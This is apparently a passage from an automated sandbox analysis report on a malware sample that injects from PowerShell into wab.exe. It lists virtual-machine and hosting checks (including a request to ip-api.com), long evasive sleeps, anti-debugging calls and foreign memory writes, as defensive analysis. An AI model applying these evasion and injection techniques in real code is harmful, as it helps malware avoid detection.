Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: A50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 24520000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 243F0000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4288	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5587	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7919	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1865	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 5030	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3983	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wscript.exe TID: 5884	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620	Thread sleep count: 7919 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4440	Thread sleep count: 1865 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4616	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -26747778906878833s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2588	Thread sleep count: 5030 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2588	Thread sleep count: 3983 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99765s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99653s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99542s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99437s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99328s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99218s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98999s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98890s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98671s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98452s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98343s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98234s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98124s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -98015s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97864s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97750s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97637s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97526s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97416s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97311s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97202s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -97088s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96962s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96842s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96732s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96624s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96512s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96406s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96296s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96172s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -96062s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95953s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95834s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95718s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95604s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95489s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95374s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95265s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95142s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -95015s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -94902s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99653	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99542	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98999	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98671	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98452	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98343	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98124	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 98015	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97864	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97750	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97637	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97526	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97416	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97311	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97202	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 97088	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96962	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96842	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96732	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96624	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96512	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96406	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96296	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96172	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 96062	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95953	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95834	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95718	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95604	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95489	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95374	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95265	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95142	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 95015	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 94902	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wscript.exe, 00000000.00000002.2079442238.000001EA79156000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2068606801.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2070156115.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076473394.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069510117.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079541397.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069833388.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.2069751324.000001EA79433000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076795867.000001EA79458000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076362482.000001EA7943B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076183249.000001EA79411000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079981179.000001EA7945A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076291584.000001EA7941F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`'
Source: wscript.exe, 00000000.00000003.2068606801.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2070156115.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2076473394.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069510117.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079541397.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2069833388.000001EA791E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW>
Source: powershell.exe, 00000002.00000002.2924619147.00000243C0710000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllph3

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_00A570B8 CheckRemoteDebuggerPresent,

10_2_00A570B8

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_04DCDAAC LdrInitializeThunk,

5_2_04DCDAAC

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe

Code function: 12_2_00382A7E GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,

12_2_00382A7E

Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Code function: 12_2_00383450 SetUnhandledExceptionFilter,		12_2_00383450
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe	Code function: 12_2_003832C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		12_2_003832C0

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4060000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: A5FA34			Jump to behavior

Creates a process in suspended mode (likely to inject code)

